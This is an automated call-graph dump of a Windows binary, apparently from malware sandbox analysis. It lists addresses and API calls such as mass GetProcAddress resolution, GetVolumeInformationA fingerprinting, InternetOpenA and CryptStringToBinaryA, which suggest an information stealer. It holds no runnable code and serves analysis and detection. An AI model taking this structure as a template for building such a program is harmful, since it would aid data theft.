416210 26521->26527 26533 401590 lstrcpy 26521->26533 27548 414f40 69 API calls ctype 26523->27548 27549 407710 125 API calls ctype 26524->27549 26532 4161e4 26526->26532 26529 416220 26527->26529 26530 4162b3 26527->26530 26536 41a740 lstrcpy 26529->26536 26535 41a7a0 lstrcpy 26530->26535 27550 415050 67 API calls ctype 26532->27550 26534 416209 26533->26534 27551 419010 54 API calls ctype 26534->27551 26539 4162c6 26535->26539 26540 416241 26536->26540 26541 401590 lstrcpy 26539->26541 26542 401590 lstrcpy 26540->26542 26543 4162da 26541->26543 26544 416255 26542->26544 27555 405960 39 API calls ctype 26543->27555 27552 405960 39 API calls ctype 26544->27552 26547 4162e0 27556 413560 36 API calls 26547->27556 26548 41625b 27553 4112d0 21 API calls ctype 26548->27553 26551 4162ab 26554 41a7a0 lstrcpy 26551->26554 26552 416266 26553 401590 lstrcpy 26552->26553 26555 4162a6 26553->26555 26556 4162fc 26554->26556 27554 413dc0 75 API calls 26555->27554 26558 401590 lstrcpy 26556->26558 26559 416310 26558->26559 27557 405960 39 API calls ctype 26559->27557 26561 41631c 26563 416338 26561->26563 27558 416630 9 API calls ctype 26561->27558 26563->26220 26565 404697 26564->26565 26566 4046ac 11 API calls 26565->26566 26567 40474f 6 API calls 26565->26567 26566->26565 26567->26224 26568->26311 26571 4010c2 ctype 26569->26571 26570 4010fd 26570->26341 26571->26570 26572 4010e2 VirtualFree 26571->26572 26572->26570 26574 401233 GlobalMemoryStatusEx 26573->26574 26574->26344 26575->26357 26577 41a7c2 26576->26577 26578 41a7ec 26577->26578 26579 41a7da lstrcpy 26577->26579 26578->26361 26579->26578 26581 41a740 lstrcpy 26580->26581 26582 416833 26581->26582 26583 41a9b0 4 API calls 26582->26583 26584 416845 26583->26584 26585 41a8a0 lstrcpy 26584->26585 26586 41684e 26585->26586 26587 41a9b0 4 API calls 26586->26587 26588 416867 26587->26588 26589 41a8a0 lstrcpy 26588->26589 26590 416870 26589->26590 26591 41a9b0 4 API calls 26590->26591 26592 41688a 26591->26592 26593 41a8a0 lstrcpy 26592->26593 26594 416893 26593->26594 26595 41a9b0 4 API calls 26594->26595 26596 4168ac 26595->26596 26597 41a8a0 lstrcpy 26596->26597 26598 4168b5 26597->26598 26599 41a9b0 4 API calls 26598->26599 26600 4168cf 26599->26600 26601 41a8a0 lstrcpy 26600->26601 26602 4168d8 26601->26602 26603 41a9b0 4 API calls 26602->26603 26604 4168f3 26603->26604 26605 41a8a0 lstrcpy 26604->26605 26606 4168fc 26605->26606 26607 41a7a0 lstrcpy 26606->26607 26608 416910 26607->26608 26608->26369 26610 41a812 26609->26610 26610->26372 26612 41a83f 26611->26612 26613 415b54 26612->26613 26614 41a87b lstrcpy 26612->26614 26613->26382 26614->26613 26616 41a8a0 lstrcpy 26615->26616 26617 416443 26616->26617 26618 41a8a0 lstrcpy 26617->26618 26619 416455 26618->26619 26620 41a8a0 lstrcpy 26619->26620 26621 416467 26620->26621 26622 41a8a0 lstrcpy 26621->26622 26623 415b86 26622->26623 26623->26388 26625 4045c0 34 API calls 26624->26625 26626 4026b4 26625->26626 26627 4045c0 34 API calls 26626->26627 26628 4026d7 26627->26628 26629 4045c0 34 API calls 26628->26629 26630 4026f0 26629->26630 26631 4045c0 34 API calls 26630->26631 26632 402709 26631->26632 26633 4045c0 34 API calls 26632->26633 26634 402736 26633->26634 26635 4045c0 34 API calls 26634->26635 26636 40274f 26635->26636 26637 4045c0 34 API calls 26636->26637 26638 402768 26637->26638 26639 4045c0 34 API calls 26638->26639 26640 402795 26639->26640 26641 4045c0 34 API calls 26640->26641 26642 4027ae 26641->26642 26643 4045c0 34 API calls 26642->26643 26644 4027c7 26643->26644 26645 4045c0 34 API calls 26644->26645 26646 4027e0 26645->26646 26647 4045c0 34 API calls 26646->26647 26648 4027f9 26647->26648 26649 4045c0 34 API calls 26648->26649 26650 402812 26649->26650 26651 4045c0 34 API calls 26650->26651 26652 40282b 26651->26652 26653 4045c0 34 API calls 26652->26653 26654 402844 26653->26654 26655 4045c0 34 API calls 26654->26655 26656 40285d 26655->26656 26657 4045c0 34 API calls 26656->26657 26658 402876 26657->26658 26659 4045c0 34 API calls 26658->26659 26660 40288f 26659->26660 26661 4045c0 34 API calls 26660->26661 26662 4028a8 26661->26662 26663 4045c0 34 API calls 26662->26663 26664 4028c1 26663->26664 26665 4045c0 34 API calls 26664->26665 26666 4028da 26665->26666 26667 4045c0 34 API calls 26666->26667 26668 4028f3 26667->26668 26669 4045c0 34 API calls 26668->26669 26670 40290c 26669->26670 26671 4045c0 34 API calls 26670->26671 26672 402925 26671->26672 26673 4045c0 34 API calls 26672->26673 26674 40293e 26673->26674 26675 4045c0 34 API calls 26674->26675 26676 402957 26675->26676 26677 4045c0 34 API calls 26676->26677 26678 402970 26677->26678 26679 4045c0 34 API calls 26678->26679 26680 402989 26679->26680 26681 4045c0 34 API calls 26680->26681 26682 4029a2 26681->26682 26683 4045c0 34 API calls 26682->26683 26684 4029bb 26683->26684 26685 4045c0 34 API calls 26684->26685 26686 4029d4 26685->26686 26687 4045c0 34 API calls 26686->26687 26688 4029ed 26687->26688 26689 4045c0 34 API calls 26688->26689 26690 402a06 26689->26690 26691 4045c0 34 API calls 26690->26691 26692 402a1f 26691->26692 26693 4045c0 34 API calls 26692->26693 26694 402a38 26693->26694 26695 4045c0 34 API calls 26694->26695 26696 402a51 26695->26696 26697 4045c0 34 API calls 26696->26697 26698 402a6a 26697->26698 26699 4045c0 34 API calls 26698->26699 26700 402a83 26699->26700 26701 4045c0 34 API calls 26700->26701 26702 402a9c 26701->26702 26703 4045c0 34 API calls 26702->26703 26704 402ab5 26703->26704 26705 4045c0 34 API calls 26704->26705 26706 402ace 26705->26706 26707 4045c0 34 API calls 26706->26707 26708 402ae7 26707->26708 26709 4045c0 34 API calls 26708->26709 26710 402b00 26709->26710 26711 4045c0 34 API calls 26710->26711 26712 402b19 26711->26712 26713 4045c0 34 API calls 26712->26713 26714 402b32 26713->26714 26715 4045c0 34 API calls 26714->26715 26716 402b4b 26715->26716 26717 4045c0 34 API calls 26716->26717 26718 402b64 26717->26718 26719 4045c0 34 API calls 26718->26719 26720 402b7d 26719->26720 26721 4045c0 34 API calls 26720->26721 26722 402b96 26721->26722 26723 4045c0 34 API calls 26722->26723 26724 402baf 26723->26724 26725 4045c0 34 API calls 26724->26725 26726 402bc8 26725->26726 26727 4045c0 34 API calls 26726->26727 26728 402be1 26727->26728 26729 4045c0 34 API calls 26728->26729 26730 402bfa 26729->26730 26731 4045c0 34 API calls 26730->26731 26732 402c13 26731->26732 26733 4045c0 34 API calls 26732->26733 26734 402c2c 26733->26734 26735 4045c0 34 API calls 26734->26735 26736 402c45 26735->26736 26737 4045c0 34 API calls 26736->26737 26738 402c5e 26737->26738 26739 4045c0 34 API calls 26738->26739 26740 402c77 26739->26740 26741 4045c0 34 API calls 26740->26741 26742 402c90 26741->26742 26743 4045c0 34 API calls 26742->26743 26744 402ca9 26743->26744 26745 4045c0 34 API calls 26744->26745 26746 402cc2 26745->26746 26747 4045c0 34 API calls 26746->26747 26748 402cdb 26747->26748 26749 4045c0 34 API calls 26748->26749 26750 402cf4 26749->26750 26751 4045c0 34 API calls 26750->26751 26752 402d0d 26751->26752 26753 4045c0 34 API calls 26752->26753 26754 402d26 26753->26754 26755 4045c0 34 API calls 26754->26755 26756 402d3f 26755->26756 26757 4045c0 34 API calls 26756->26757 26758 402d58 26757->26758 26759 4045c0 34 API calls 26758->26759 26760 402d71 26759->26760 26761 4045c0 34 API calls 26760->26761 26762 402d8a 26761->26762 26763 4045c0 34 API calls 26762->26763 26764 402da3 26763->26764 26765 4045c0 34 API calls 26764->26765 26766 402dbc 26765->26766 26767 4045c0 34 API calls 26766->26767 26768 402dd5 26767->26768 26769 4045c0 34 API calls 26768->26769 26770 402dee 26769->26770 26771 4045c0 34 API calls 26770->26771 26772 402e07 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 402e20 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 402e39 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 402e52 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 402e6b 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 402e84 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 402e9d 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 402eb6 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 402ecf 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 402ee8 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 402f01 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 402f1a 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 402f33 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 402f4c 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 402f65 26799->26800 26801 4045c0 34 API calls 26800->26801 26802 402f7e 26801->26802 26803 4045c0 34 API calls 26802->26803 26804 402f97 26803->26804 26805 4045c0 34 API calls 26804->26805 26806 402fb0 26805->26806 26807 4045c0 34 API calls 26806->26807 26808 402fc9 26807->26808 26809 4045c0 34 API calls 26808->26809 26810 402fe2 26809->26810 26811 4045c0 34 API calls 26810->26811 26812 402ffb 26811->26812 26813 4045c0 34 API calls 26812->26813 26814 403014 26813->26814 26815 4045c0 34 API calls 26814->26815 26816 40302d 26815->26816 26817 4045c0 34 API calls 26816->26817 26818 403046 26817->26818 26819 4045c0 34 API calls 26818->26819 26820 40305f 26819->26820 26821 4045c0 34 API calls 26820->26821 26822 403078 26821->26822 26823 4045c0 34 API calls 26822->26823 26824 403091 26823->26824 26825 4045c0 34 API calls 26824->26825 26826 4030aa 26825->26826 26827 4045c0 34 API calls 26826->26827 26828 4030c3 26827->26828 26829 4045c0 34 API calls 26828->26829 26830 4030dc 26829->26830 26831 4045c0 34 API calls 26830->26831 26832 4030f5 26831->26832 26833 4045c0 34 API calls 26832->26833 26834 40310e 26833->26834 26835 4045c0 34 API calls 26834->26835 26836 403127 26835->26836 26837 4045c0 34 API calls 26836->26837 26838 403140 26837->26838 26839 4045c0 34 API calls 26838->26839 26840 403159 26839->26840 26841 4045c0 34 API calls 26840->26841 26842 403172 26841->26842 26843 4045c0 34 API calls 26842->26843 26844 40318b 26843->26844 26845 4045c0 34 API calls 26844->26845 26846 4031a4 26845->26846 26847 4045c0 34 API calls 26846->26847 26848 4031bd 26847->26848 26849 4045c0 34 API calls 26848->26849 26850 4031d6 26849->26850 26851 4045c0 34 API calls 26850->26851 26852 4031ef 26851->26852 26853 4045c0 34 API calls 26852->26853 26854 403208 26853->26854 26855 4045c0 34 API calls 26854->26855 26856 403221 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 40323a 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 403253 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 40326c 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 403285 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 40329e 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 4032b7 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 4032d0 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 4032e9 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 403302 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 40331b 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 403334 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 40334d 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 403366 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 40337f 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 403398 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 4033b1 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 4033ca 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 4033e3 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 4033fc 26893->26894 26895 4045c0 34 API calls 26894->26895 26896 403415 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 40342e 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 403447 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 403460 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 403479 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 403492 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 4034ab 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 4034c4 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 4034dd 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 4034f6 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 40350f 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 403528 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 403541 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 40355a 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 403573 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 40358c 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 4035a5 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 4035be 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 4035d7 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 4035f0 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 403609 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 403622 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 40363b 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 403654 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 40366d 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 403686 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 40369f 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 4036b8 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 4036d1 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 4036ea 26953->26954 26955 4045c0 34 API calls 26954->26955 26956 403703 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 40371c 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 403735 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 40374e 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 403767 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 403780 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 403799 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 4037b2 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 4037cb 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 4037e4 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 4037fd 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 403816 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 40382f 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 403848 26981->26982 26983 4045c0 34 API calls 26982->26983 26984 403861 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 40387a 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 403893 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 4038ac 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 4038c5 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 4038de 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 4038f7 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 403910 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 403929 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 403942 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 40395b 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 403974 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 40398d 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 4039a6 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 4039bf 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 4039d8 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 4039f1 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 403a0a 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 403a23 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 403a3c 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 403a55 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 403a6e 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 403a87 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 403aa0 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 403ab9 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 403ad2 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 403aeb 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 403b04 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 403b1d 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 403b36 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 403b4f 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 403b68 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 403b81 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 403b9a 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 403bb3 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 403bcc 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 403be5 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 403bfe 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 403c17 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 403c30 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 403c49 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 403c62 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 403c7b 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403c94 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403cad 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 403cc6 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 403cdf 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 403cf8 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403d11 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 403d2a 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403d43 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403d5c 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 403d75 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403d8e 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 403da7 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 403dc0 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 403dd9 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 403df2 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 403e0b 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 403e24 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403e3d 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 403e56 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403e6f 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 403e88 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 403ea1 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 403eba 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 403ed3 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 403eec 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 403f05 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 403f1e 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 403f37 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 403f50 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 403f69 27127->27128 27129 4045c0 34 API calls 27128->27129 27130 403f82 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 403f9b 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 403fb4 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 403fcd 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 403fe6 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 403fff 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 404018 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 404031 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 40404a 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 404063 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 40407c 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 404095 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 4040ae 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 4040c7 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 4040e0 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 4040f9 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 404112 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 40412b 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 404144 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 40415d 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 404176 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 40418f 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 4041a8 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 4041c1 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 4041da 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 4041f3 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 40420c 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 404225 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 40423e 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 404257 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 404270 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 404289 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 4042a2 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 4042bb 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 4042d4 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 4042ed 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 404306 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 40431f 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 404338 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 404351 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 40436a 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 404383 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 40439c 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 4043b5 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 4043ce 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 4043e7 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 404400 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 404419 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 404432 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 40444b 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 404464 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 40447d 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 404496 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 4044af 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 4044c8 27237->27238 27239 4045c0 34 API calls 27238->27239 27240 4044e1 27239->27240 27241 4045c0 34 API calls 27240->27241 27242 4044fa 27241->27242 27243 4045c0 34 API calls 27242->27243 27244 404513 27243->27244 27245 4045c0 34 API calls 27244->27245 27246 40452c 27245->27246 27247 4045c0 34 API calls 27246->27247 27248 404545 27247->27248 27249 4045c0 34 API calls 27248->27249 27250 40455e 27249->27250 27251 4045c0 34 API calls 27250->27251 27252 404577 27251->27252 27253 4045c0 34 API calls 27252->27253 27254 404590 27253->27254 27255 4045c0 34 API calls 27254->27255 27256 4045a9 27255->27256 27257 419c10 27256->27257 27258 419c20 43 API calls 27257->27258 27259 41a036 8 API calls 27257->27259 27258->27259 27260 41a146 27259->27260 27261 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27259->27261 27262 41a153 8 API calls 27260->27262 27263 41a216 27260->27263 27261->27260 27262->27263 27264 41a298 27263->27264 27265 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27263->27265 27266 41a2a5 6 API calls 27264->27266 27267 41a337 27264->27267 27265->27264 27266->27267 27268 41a344 9 API calls 27267->27268 27269 41a41f 27267->27269 27268->27269 27270 41a4a2 27269->27270 27271 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27269->27271 27272 41a4ab GetProcAddress GetProcAddress 27270->27272 27273 41a4dc 27270->27273 27271->27270 27272->27273 27274 41a515 27273->27274 27275 41a4e5 GetProcAddress GetProcAddress 27273->27275 27276 41a612 27274->27276 27277 41a522 10 API calls 27274->27277 27275->27274 27278 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27276->27278 27279 41a67d 27276->27279 27277->27276 27278->27279 27280 41a686 GetProcAddress 27279->27280 27281 41a69e 27279->27281 27280->27281 27282 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27281->27282 27283 415ca3 27281->27283 27282->27283 27284 401590 27283->27284 27559 401670 27284->27559 27287 41a7a0 lstrcpy 27288 4015b5 27287->27288 27289 41a7a0 lstrcpy 27288->27289 27290 4015c7 27289->27290 27291 41a7a0 lstrcpy 27290->27291 27292 4015d9 27291->27292 27293 41a7a0 lstrcpy 27292->27293 27294 401663 27293->27294 27295 415510 27294->27295 27296 415521 27295->27296 27297 41a820 2 API calls 27296->27297 27298 41552e 27297->27298 27299 41a820 2 API calls 27298->27299 27300 41553b 27299->27300 27301 41a820 2 API calls 27300->27301 27302 415548 27301->27302 27303 41a740 lstrcpy 27302->27303 27304 415555 27303->27304 27305 41a740 lstrcpy 27304->27305 27306 415562 27305->27306 27307 41a740 lstrcpy 27306->27307 27308 41556f 27307->27308 27309 41a740 lstrcpy 27308->27309 27349 41557c 27309->27349 27310 41a740 lstrcpy 27310->27349 27311 41a8a0 lstrcpy 27311->27349 27312 415643 StrCmpCA 27312->27349 27313 4156a0 StrCmpCA 27314 4157dc 27313->27314 27313->27349 27315 41a8a0 lstrcpy 27314->27315 27316 4157e8 27315->27316 27317 41a820 2 API calls 27316->27317 27319 4157f6 27317->27319 27318 41a820 lstrlenA lstrcpy 27318->27349 27321 41a820 2 API calls 27319->27321 27320 415856 StrCmpCA 27322 415991 27320->27322 27320->27349 27324 415805 27321->27324 27323 41a8a0 lstrcpy 27322->27323 27326 41599d 27323->27326 27327 401670 lstrcpy 27324->27327 27325 401590 lstrcpy 27325->27349 27328 41a820 2 API calls 27326->27328 27347 415811 27327->27347 27331 4159ab 27328->27331 27329 4152c0 29 API calls 27329->27349 27330 4151f0 23 API calls 27330->27349 27333 41a820 2 API calls 27331->27333 27332 415a0b StrCmpCA 27334 415a16 Sleep 27332->27334 27335 415a28 27332->27335 27336 4159ba 27333->27336 27334->27349 27337 41a8a0 lstrcpy 27335->27337 27338 401670 lstrcpy 27336->27338 27339 415a34 27337->27339 27338->27347 27340 41a820 2 API calls 27339->27340 27341 415a43 27340->27341 27342 41a820 2 API calls 27341->27342 27343 415a52 27342->27343 27345 401670 lstrcpy 27343->27345 27344 41578a StrCmpCA 27344->27349 27345->27347 27346 41a7a0 lstrcpy 27346->27349 27347->26403 27348 41593f StrCmpCA 27348->27349 27349->27310 27349->27311 27349->27312 27349->27313 27349->27318 27349->27320 27349->27325 27349->27329 27349->27330 27349->27332 27349->27344 27349->27346 27349->27348 27351 417553 GetVolumeInformationA 27350->27351 27352 41754c 27350->27352 27353 417591 27351->27353 27352->27351 27354 4175fc GetProcessHeap HeapAlloc 27353->27354 27355 417619 27354->27355 27356 417628 wsprintfA 27354->27356 27357 41a740 lstrcpy 27355->27357 27358 41a740 lstrcpy 27356->27358 27359 415da7 27357->27359 27358->27359 27359->26424 27361 41a7a0 lstrcpy 27360->27361 27362 404899 27361->27362 27568 4047b0 27362->27568 27364 4048a5 27365 41a740 lstrcpy 27364->27365 27366 4048d7 27365->27366 27367 41a740 lstrcpy 27366->27367 27368 4048e4 27367->27368 27369 41a740 lstrcpy 27368->27369 27370 4048f1 27369->27370 27371 41a740 lstrcpy 27370->27371 27372 4048fe 27371->27372 27373 41a740 lstrcpy 27372->27373 27374 40490b InternetOpenA StrCmpCA 27373->27374 27375 404944 27374->27375 27376 404955 27375->27376 27377 404ecb InternetCloseHandle 27375->27377 27581 418b60 GetSystemTime lstrcpy lstrcpy 27376->27581 27378 404ee8 27377->27378 27576 409ac0 CryptStringToBinaryA 27378->27576 27380 404963 27582 41a920 lstrcpy lstrcpy lstrcatA 27380->27582 27383 404976 27385 41a8a0 lstrcpy 27383->27385 27390 40497f 27385->27390 27386 41a820 2 API calls 27387 404f05 27386->27387 27388 41a9b0 4 API calls 27387->27388 27391 404f1b 27388->27391 27389 404f27 ctype 27392 41a7a0 lstrcpy 27389->27392 27394 41a9b0 4 API calls 27390->27394 27393 41a8a0 lstrcpy 27391->27393 27405 404f57 27392->27405 27393->27389 27395 4049a9 27394->27395 27396 41a8a0 lstrcpy 27395->27396 27397 4049b2 27396->27397 27398 41a9b0 4 API calls 27397->27398 27399 4049d1 27398->27399 27400 41a8a0 lstrcpy 27399->27400 27401 4049da 27400->27401 27583 41a920 lstrcpy lstrcpy lstrcatA 27401->27583 27403 4049f8 27404 41a8a0 lstrcpy 27403->27404 27406 404a01 27404->27406 27405->26427 27407 41a9b0 4 API calls 27406->27407 27408 404a20 27407->27408 27409 41a8a0 lstrcpy 27408->27409 27410 404a29 27409->27410 27411 41a9b0 4 API calls 27410->27411 27412 404a48 27411->27412 27413 41a8a0 